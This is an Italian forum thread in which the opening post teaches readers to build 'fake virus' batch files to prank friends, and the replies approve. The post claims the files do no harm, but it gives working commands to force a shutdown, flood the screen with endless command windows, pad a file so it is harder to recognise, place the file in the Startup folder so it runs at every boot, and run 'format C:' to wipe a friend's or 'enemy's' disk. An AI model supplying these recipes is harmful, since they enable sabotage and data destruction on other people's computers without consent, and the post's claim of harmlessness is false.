"Finti" Virus, Per fare degli scherzi agli amici...

« Older   Newer »
  Share  
cirema94
icon11  view post Posted on 8/4/2010, 11:59




Vi voglio assicurare che questi finti virus non danneggiano in alcun modo il vostro computer o quello del vostro amico, sono solo una serie di codici, che fanno spegnere il pc o fargli aprire un bel pò di finestre, ma basterà cancellare il file, e non rimarrà più niente...allora ecco la guida...


Prima di tutto aprite il blocco note...di solito è situato su...
Start > Tutti i programmi > Accessori > Blocco note

E adesso comincia la creazione del "finto virus"

SHUT DOWN

Allora per creare uno SHUT DOWN, un virus che permette di spegnere il pc con un conto alla rovescia e un messaggio si fà così...scrivete

shutdown -s -t "NUMERO DEI SECONDI PRIMA CHE SI SPENGA" -c "MESSAGGIO"
una volta scritto questo, dovete salvare il tutto e fate...
salva con nome, e rinominate il file con..."QUELLO CHE VOLETE".bat...

MI RACCOMANDO!

Il .bat dopo il nome del virus è fondamentale per dargli l'estensione adeguata, altrimenti non funzionerà!


VIRUS DEGLI START
questo falso virus serve a mandare in tilt il pc facendo aprire moltissime finestre del prompt
È molto semplice da creare, basta aprire il blocco note e scrivere...
START
START
START
START
quante volte volete andando sempre accapo e scrivendo sempre in stampatello...più volte lo scrivete, più finestre del prompt dei comandi si apriranno...potete anche provarlo voi scrivendo START solo un paio di volte...poi salvate il tutto come file .bat ...come ho spiegato sopra.


VARIANTE DEL VIRUS DEGLI START
Con questa variante siete in grado di aprire molteplici finestre del prompt, ma appena ne si chiude una, se ne aprono altre...ecco come fare
Aprite il blocco note e scrivete...
:infinitedos
@start
@echo
@start
@Goto infinitedos
e salvare in .bat...

Ora...
siccome è facile riconoscere un virus dalla grandezza, e questi file di solito sono di massimo 2 kb...
bisogna aumentare la grandezza del file con questa stringa...da mettere dopo il virus,...scrivete...
@RAW MOLTISSIME LETTERE A CASO...
più lettere metterete più il virus sarà grande...

Adesso si passa al difficile...questo fatelo solo nel caso in cui vorrete DAVVERO...e dico DAVVERO distruggere il pc a un vostro amico...o più che altro NEMICO... :argh:
Con questa stringa sarete in grado di copiare automaticamente il virus che si vuole nella barra dell'ESECUZIONE AUTOMATICA...cioè...ogni volta che ad esempio il vostro "caro" amico accenderà il pc, gli si spegnerà automaticamente se prima di questa stringa avrete inserito quella dello SHUT DOWN...comunque ecco di seguito la stringa...

COPY nomedelvirus.bat "C:\Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione Automatica


E questo è DAVVERO PESANTE...

se volete formattare il "vostro" pc, o MALAUGURATAMENTE,quello di un vostro "amico" velocemente e senza intoppi si fà così...
aprite il blocco note e scrivete...

format C:\Autotest\q\u

ora tutte queste stringhe potete combinarle a vostro piacimento per creare il vostro bel "finto" virus...per stupire...o meno...gli amici



Vorrei puntualizzare che questo messaggio è solo a scopo informativo, e se qualunque di voi dovesse in qualsiasi modo compromettere le funzionalità del vostro pc di un vostro amico, siete voi ad avere tutte le responsabilità del caso in questione...

Detto questo arrivederci...

cirema94

 
Top
view post Posted on 9/4/2010, 14:05
Avatar

Senior Member
»»»»»»»

Group:
L'Antea!
Posts:
13,703

Status:


Ouh ! Grazie.
 
» Web   Top
view post Posted on 2/8/2010, 15:54

The God of Art
»»»»»

Group:
Member
Posts:
4,878
Location:
L'impero di Mushynya! ^ç^

Status:


mhwahahahahah
 
Top
Sakurabo ~
view post Posted on 17/10/2010, 17:47




ma ma sono davvero crudeli
mi piacciono
 
Top
*death the kid*
view post Posted on 13/3/2011, 19:43




penso lo provero.....ahahahah!
 
Top
4 replies since 8/4/2010, 11:59   4446 views
  Share